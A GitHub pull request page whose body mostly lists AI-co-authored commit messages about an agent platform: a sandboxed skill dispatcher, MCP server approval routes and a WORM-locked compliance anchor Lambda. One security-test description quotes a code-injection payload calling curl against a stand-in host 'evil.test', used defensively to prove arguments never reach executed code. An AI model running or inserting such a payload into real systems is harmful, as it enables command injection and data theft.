feat: add deployment status to Settings page#7
Merged
Conversation
Surface deployment infrastructure info (stage, region, services, resources, URLs) on the admin Settings page via a new deploymentStatus GraphQL query that reads Lambda environment variables. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
ericodom
added a commit
that referenced
this pull request
Apr 24, 2026
…SI-2/3/6) (#510) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
ericodom
added a commit
that referenced
this pull request
Apr 24, 2026
…s inert) (#511) The single `Skill(name, args)` meta-tool that U6 flips to be the sole invocation path once U7's shadow harness validates equivalence. Today it ships as inert code — the Dockerfile wildcard COPY picks it up (via U2a) and _boot_assert registers it, but server.py's live Agent(tools=...) path still routes through the existing run_skill_dispatch / composition_runner code. ## Why ship inert The plan (#7 §U4/U5/U6/U7) explicitly gates U6's cutover on U7 PASS — U7 is the shadow harness that dual-dispatches both the old and new paths on real invocations and measures divergence. Wiring U5 into the live Agent(tools=...) before U7 exists would swap the invocation path without the safety net the plan itself calls for. This PR therefore ships the module + tests and defers server.py wiring to U7. ## What lands ### `container-sources/skill_meta_tool.py` - `SessionAllowlist` — intersection of `tenant_skills ∩ template_skills ∩ ¬template_blocks ∩ ¬tenant_kill_switches` pre-computed once at Agent(tools=...). Narrow-only: a template cannot widen past what the tenant enabled (plan R6/R7). - `invoke_skill(name, args, *, ctx)` — pure entry point the Strands @tool wrapper calls. Routes script-bundle skills to U4's `dispatch_skill_script`; pure-SKILL.md skills return their body for in-prompt consumption (no sandbox roundtrip). - `build_skill_meta_tool(ctx)` — factory returning the coroutine the `@strands.tool` decorator wraps. Decoupled from the SDK so unit tests exercise the full decision tree without importing strands. - `intersect_allowed_tools(declared, session_tools)` — narrow-only intersection of a skill's declared `allowed-tools` frontmatter against the session's effective tool set. Warns on declared-but-missing so operators can spot disabled dependencies. - `SkillUnauthorized` — distinct error from `SkillNotFound` so the model cannot enumerate tenant-scoped catalog membership by probing slugs. Both raise; the audit log gets full context. ### `test_skill_meta_tool.py` — 12 cases Covers plan AE4 + every listed test scenario: - happy path: Skill("sales-prep") routes to dispatcher with correct args - nested Skill() threads the same TurnCounters through - pure-SKILL.md slug returns body, no sandbox - unknown slug → SkillNotFound - in catalog but not in session → SkillUnauthorized - SessionAllowlist triple-constraint intersection correctness - tenant kill-switch trumps template enablement (R7 precedence) - allowed-tools frontmatter narrows (never widens) past session tools - build_skill_meta_tool closure captures ctx correctly ### `_boot_assert.EXPECTED_CONTAINER_SOURCES` Adds skill_meta_tool so the Dockerfile RUN asserts it landed. ## What this PR does NOT do - Does NOT wire `Skill` into server.py's Agent(tools=...). Deferred to U7 (shadow wiring) then U6 (canonical cutover). - Does NOT drop the AGENTS.md-conditional around AgentSkills. Plan calls for this at U5 but it's entangled with the live-path swap — lands alongside the cutover. - Does NOT suppress AgentSkills' built-in `skills` tool. Same reason — suppression only makes sense once `Skill` is the canonical path. ## Test counts - `test_skill_meta_tool.py` — 12 cases - Full agent-container suite: 223 green (12 new + 211 existing) - ruff import-sort clean on new files Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U5). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
ericodom
added a commit
that referenced
this pull request
Apr 24, 2026
…520) Wires the admin decision surface for plugin-uploaded MCP servers. Plan §U11 lands: - `POST /api/tenants/:tenantId/mcp-servers/:serverId/approve` computes `url_hash = sha256(canonical(url, auth_config))`, sets `status='approved'` + `approved_by` + `approved_at`. - `POST /api/tenants/:tenantId/mcp-servers/:serverId/reject` clears approval metadata; reason captured in CloudWatch audit log. - `buildMcpConfigs` SQL gate narrows to `status='approved' AND enabled=true`, with an in-code defensive hash-match check for drift (grandfathered `url_hash IS NULL` rows pass through). - `applyMcpServerFieldUpdate` reverts approved rows back to `pending` on any url/auth_config mutation (SI-5). mcpUpdateServer + mcpRegisterServer upsert + DCR cache route through it; DCR stays approved by recomputing url_hash (system-internal discovery, not admin intent). - Daily EventBridge sweeper auto-rejects pending rows older than 30 days. - Admin SPA renders the approval badge and surfaces Approve / Reject buttons for pending rows; Reject accepts an optional reason. - Cognito-only client (`cognitoFetch`) for the approval routes; mirrors plugin-upload.ts's REST analogue of requireTenantAdmin. - 40 new unit tests: hash canonicalization, approve/reject handler (authz + tenant isolation), SI-5 url-swap protection, TTL sweeper, and buildMcpConfigs approved-filter behavior. Terraform wires two new handlers (`mcp-approval`, `mcp-approval-sweeper`), four new API Gateway routes, and a daily cron. No schema migration required — `status`, `url_hash`, `approved_by`, `approved_at` all landed with U3 migration 0025. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
8 tasks
ericodom
added a commit
that referenced
this pull request
May 5, 2026
feat: add deployment status to Settings page
ericodom
added a commit
that referenced
this pull request
May 5, 2026
…SI-2/3/6) (#510) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
ericodom
added a commit
that referenced
this pull request
May 5, 2026
…s inert) (#511) The single `Skill(name, args)` meta-tool that U6 flips to be the sole invocation path once U7's shadow harness validates equivalence. Today it ships as inert code — the Dockerfile wildcard COPY picks it up (via U2a) and _boot_assert registers it, but server.py's live Agent(tools=...) path still routes through the existing run_skill_dispatch / composition_runner code. ## Why ship inert The plan (#7 §U4/U5/U6/U7) explicitly gates U6's cutover on U7 PASS — U7 is the shadow harness that dual-dispatches both the old and new paths on real invocations and measures divergence. Wiring U5 into the live Agent(tools=...) before U7 exists would swap the invocation path without the safety net the plan itself calls for. This PR therefore ships the module + tests and defers server.py wiring to U7. ## What lands ### `container-sources/skill_meta_tool.py` - `SessionAllowlist` — intersection of `tenant_skills ∩ template_skills ∩ ¬template_blocks ∩ ¬tenant_kill_switches` pre-computed once at Agent(tools=...). Narrow-only: a template cannot widen past what the tenant enabled (plan R6/R7). - `invoke_skill(name, args, *, ctx)` — pure entry point the Strands @tool wrapper calls. Routes script-bundle skills to U4's `dispatch_skill_script`; pure-SKILL.md skills return their body for in-prompt consumption (no sandbox roundtrip). - `build_skill_meta_tool(ctx)` — factory returning the coroutine the `@strands.tool` decorator wraps. Decoupled from the SDK so unit tests exercise the full decision tree without importing strands. - `intersect_allowed_tools(declared, session_tools)` — narrow-only intersection of a skill's declared `allowed-tools` frontmatter against the session's effective tool set. Warns on declared-but-missing so operators can spot disabled dependencies. - `SkillUnauthorized` — distinct error from `SkillNotFound` so the model cannot enumerate tenant-scoped catalog membership by probing slugs. Both raise; the audit log gets full context. ### `test_skill_meta_tool.py` — 12 cases Covers plan AE4 + every listed test scenario: - happy path: Skill("sales-prep") routes to dispatcher with correct args - nested Skill() threads the same TurnCounters through - pure-SKILL.md slug returns body, no sandbox - unknown slug → SkillNotFound - in catalog but not in session → SkillUnauthorized - SessionAllowlist triple-constraint intersection correctness - tenant kill-switch trumps template enablement (R7 precedence) - allowed-tools frontmatter narrows (never widens) past session tools - build_skill_meta_tool closure captures ctx correctly ### `_boot_assert.EXPECTED_CONTAINER_SOURCES` Adds skill_meta_tool so the Dockerfile RUN asserts it landed. ## What this PR does NOT do - Does NOT wire `Skill` into server.py's Agent(tools=...). Deferred to U7 (shadow wiring) then U6 (canonical cutover). - Does NOT drop the AGENTS.md-conditional around AgentSkills. Plan calls for this at U5 but it's entangled with the live-path swap — lands alongside the cutover. - Does NOT suppress AgentSkills' built-in `skills` tool. Same reason — suppression only makes sense once `Skill` is the canonical path. ## Test counts - `test_skill_meta_tool.py` — 12 cases - Full agent-container suite: 223 green (12 new + 211 existing) - ruff import-sort clean on new files Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U5). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
ericodom
added a commit
that referenced
this pull request
May 5, 2026
…520) Wires the admin decision surface for plugin-uploaded MCP servers. Plan §U11 lands: - `POST /api/tenants/:tenantId/mcp-servers/:serverId/approve` computes `url_hash = sha256(canonical(url, auth_config))`, sets `status='approved'` + `approved_by` + `approved_at`. - `POST /api/tenants/:tenantId/mcp-servers/:serverId/reject` clears approval metadata; reason captured in CloudWatch audit log. - `buildMcpConfigs` SQL gate narrows to `status='approved' AND enabled=true`, with an in-code defensive hash-match check for drift (grandfathered `url_hash IS NULL` rows pass through). - `applyMcpServerFieldUpdate` reverts approved rows back to `pending` on any url/auth_config mutation (SI-5). mcpUpdateServer + mcpRegisterServer upsert + DCR cache route through it; DCR stays approved by recomputing url_hash (system-internal discovery, not admin intent). - Daily EventBridge sweeper auto-rejects pending rows older than 30 days. - Admin SPA renders the approval badge and surfaces Approve / Reject buttons for pending rows; Reject accepts an optional reason. - Cognito-only client (`cognitoFetch`) for the approval routes; mirrors plugin-upload.ts's REST analogue of requireTenantAdmin. - 40 new unit tests: hash canonicalization, approve/reject handler (authz + tenant isolation), SI-5 url-swap protection, TTL sweeper, and buildMcpConfigs approved-filter behavior. Terraform wires two new handlers (`mcp-approval`, `mcp-approval-sweeper`), four new API Gateway routes, and a daily cron. No schema migration required — `status`, `url_hash`, `approved_by`, `approved_at` all landed with U3 migration 0025. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This was referenced May 7, 2026
ericodom
added a commit
that referenced
this pull request
May 7, 2026
…k retention)
Replaces `_anchor_fn_inert` with `_anchor_fn_live`, which performs the
actual S3 PutObject of per-tenant proof slices and the global anchor
JSON to the WORM-locked compliance bucket. The anchor object carries an
explicit `ObjectLockMode` + `ObjectLockRetainUntilDate` per-object
override (mirroring the bucket-default), so the retention contract is
portable across buckets and visible at the call site. Slices write
under `proofs/tenant-{id}/cadence-{cadence_id}.json` (no per-object
lock; bucket default applies); anchor writes last so a partial failure
never publishes a verifier-discoverable commit point.
Five guards land alongside the body swap:
* **Deterministic cadence_id** — sha256 of canonical chain-head
fingerprint, reshaped to UUIDv7 form. Same heads produce the same
cadence_id, so a retry after a partial failure overwrites its own
slice keys instead of orphaning slices for the full 365-day
retention window.
* **Merkle self-check** — `_anchor_fn_live` recomputes the root from
the received leaves and asserts equality before any PutObject. Cheap
insurance against latent runAnchorPass arithmetic bugs becoming
WORM-locked poisoned evidence.
* **Layer 2 body-swap test** — `compliance-anchor-s3-spy.test.ts`
mocks S3Client.send and asserts the live function actually issues
PutObjectCommand for both slices and anchor (with SHA256 checksum,
SSE-KMS, and ObjectLock retention on the anchor key only). Pairs
with the Layer 1 identity assertion (`getWiredAnchorFn() ===
_anchor_fn_live`) in the integration test.
* **Sibling watchdog IAM role** — watchdog moves OFF the shared
lambda role onto a dedicated role with `kms:DescribeKey` only on
the bucket CMK (NOT `kms:Decrypt` — the watchdog never reads
object bodies), `s3:ListBucket` prefix-conditioned on `anchors/`,
and an explicit Deny on every Delete + Bypass + Lock-mutation
action so future role broadening cannot turn the watchdog into a
deletion vector.
* **Dev-COMPLIANCE precondition** — `var.allow_compliance_in_non_prod`
(default false) blocks accidentally locking a dev bucket into
irreversible COMPLIANCE bytes via a stage typo.
Watchdog flips to live: `mode: "live"`, ListObjectsV2 with 1000-key
truncation warning, max-LastModified pick, `ComplianceAnchorGap` metric
emission (suppressed on greenfield-empty bucket), heartbeat unchanged.
The CloudWatch alarm cuts over: gap → `treat_missing_data = breaching`
(catches both real gaps and a watchdog-down regression); a sibling
heartbeat-missing alarm is born `notBreaching` so deploy-time gaps
don't fire it before the first heartbeat lands (Decision #7).
Operator pre-merge step: `terraform state mv` the watchdog from the
for_each handler set to the new standalone resource address. Without
it, the next `terraform apply` fails with ResourceConflictException on
the function name. Plan documents the exact command.
Plan: docs/plans/2026-05-07-012-feat-compliance-u8b-anchor-lambda-live-plan.md
Master plan: docs/plans/2026-05-06-011-feat-compliance-audit-event-log-plan.md (U8b)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
ericodom
added a commit
that referenced
this pull request
May 7, 2026
…k retention) (#927) * feat(compliance): U8b — anchor Lambda live (S3 PutObject + Object Lock retention) Replaces `_anchor_fn_inert` with `_anchor_fn_live`, which performs the actual S3 PutObject of per-tenant proof slices and the global anchor JSON to the WORM-locked compliance bucket. The anchor object carries an explicit `ObjectLockMode` + `ObjectLockRetainUntilDate` per-object override (mirroring the bucket-default), so the retention contract is portable across buckets and visible at the call site. Slices write under `proofs/tenant-{id}/cadence-{cadence_id}.json` (no per-object lock; bucket default applies); anchor writes last so a partial failure never publishes a verifier-discoverable commit point. Five guards land alongside the body swap: * **Deterministic cadence_id** — sha256 of canonical chain-head fingerprint, reshaped to UUIDv7 form. Same heads produce the same cadence_id, so a retry after a partial failure overwrites its own slice keys instead of orphaning slices for the full 365-day retention window. * **Merkle self-check** — `_anchor_fn_live` recomputes the root from the received leaves and asserts equality before any PutObject. Cheap insurance against latent runAnchorPass arithmetic bugs becoming WORM-locked poisoned evidence. * **Layer 2 body-swap test** — `compliance-anchor-s3-spy.test.ts` mocks S3Client.send and asserts the live function actually issues PutObjectCommand for both slices and anchor (with SHA256 checksum, SSE-KMS, and ObjectLock retention on the anchor key only). Pairs with the Layer 1 identity assertion (`getWiredAnchorFn() === _anchor_fn_live`) in the integration test. * **Sibling watchdog IAM role** — watchdog moves OFF the shared lambda role onto a dedicated role with `kms:DescribeKey` only on the bucket CMK (NOT `kms:Decrypt` — the watchdog never reads object bodies), `s3:ListBucket` prefix-conditioned on `anchors/`, and an explicit Deny on every Delete + Bypass + Lock-mutation action so future role broadening cannot turn the watchdog into a deletion vector. * **Dev-COMPLIANCE precondition** — `var.allow_compliance_in_non_prod` (default false) blocks accidentally locking a dev bucket into irreversible COMPLIANCE bytes via a stage typo. Watchdog flips to live: `mode: "live"`, ListObjectsV2 with 1000-key truncation warning, max-LastModified pick, `ComplianceAnchorGap` metric emission (suppressed on greenfield-empty bucket), heartbeat unchanged. The CloudWatch alarm cuts over: gap → `treat_missing_data = breaching` (catches both real gaps and a watchdog-down regression); a sibling heartbeat-missing alarm is born `notBreaching` so deploy-time gaps don't fire it before the first heartbeat lands (Decision #7). Operator pre-merge step: `terraform state mv` the watchdog from the for_each handler set to the new standalone resource address. Without it, the next `terraform apply` fails with ResourceConflictException on the function name. Plan documents the exact command. Plan: docs/plans/2026-05-07-012-feat-compliance-u8b-anchor-lambda-live-plan.md Master plan: docs/plans/2026-05-06-011-feat-compliance-audit-event-log-plan.md (U8b) Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(review): apply autofix feedback Drop unused drizzle-orm imports flagged by ce-code-review: - compliance-anchor.ts: `and`, `eq`, `gt`, plus the `auditEvents` schema import (raw SQL via `` sql`...` `` is the actual codepath there) - compliance-anchor.integration.test.ts: `and`, `gt`, `auditOutbox` Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(compliance): make compliance-anchor.test.ts stub anchorFn async `AnchorFn` is now `=> Promise<...>` in U8b. The timestamp-normalization test added in #925 used a sync stub, which fails typecheck against the new contract. Switch the stub to `async () => ({ anchored: false })` — test still exercises the same path (recorded_at coercion → drainer update) since runAnchorPass awaits the result either way. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
deploymentStatusGraphQL query + resolver that reads Lambda env vars (no DB, no live AWS calls)DeploymentStatustype to GraphQL schema with stage, region, services, resources, and URLsADMIN_URL,DOCS_URL,APPSYNC_REALTIME_URL,ECR_REPOSITORY_URL,AWS_ACCOUNT_ID) to Lambda common_envTest plan
terraform planconfirms new env vars are added without drift🤖 Generated with Claude Code